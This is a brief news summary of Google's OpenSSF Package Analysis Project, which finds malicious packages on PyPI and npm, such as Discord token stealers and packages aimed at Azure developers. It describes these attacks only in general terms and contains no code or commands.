"Open-Source Security: It's Too Easy to Upload 'Devastating' Malicious Packages, Warns Google"
Google has been working on finding malicious code packages sneaked into open source software projects. The Open Source Security Foundation's (OpenSSF) Package Analysis Project aims to help automate the process of identifying malicious packages distributed on popular package repositories, such as PyPI for Python and npm for JavaScript. The initiative will provide data pertaining to different types of malicious packages and help inform those who work on open source software on how to improve the security of the software supply chain. Package repositories have limited resources to review the large number of daily updates but must maintain an open model in which anyone can contribute. Caleb Brown of Google's Open Source Security Team emphasizes that this has resulted in regular uploads of malicious packages to popular repositories, which could sometimes have devastating consequences for users. The Package Analysis project identified over 200 malicious packages in one month. It discovered token theft attacks targeting Discord users that were distributed on PyPI and npm. A malicious PyPI package, for example, attacked the Discord Windows client through a backdoor downloaded from GitHub and installed on the Discord app to steal Discord tokens. In March, researchers found that developers using Microsoft's Azure cloud were being targeted with hundreds of malicious packages on npm. This article continues to discuss the goals of the Package Analysis Project, the risks of software supply chain security in open source, and other efforts made to bolster supply chain security.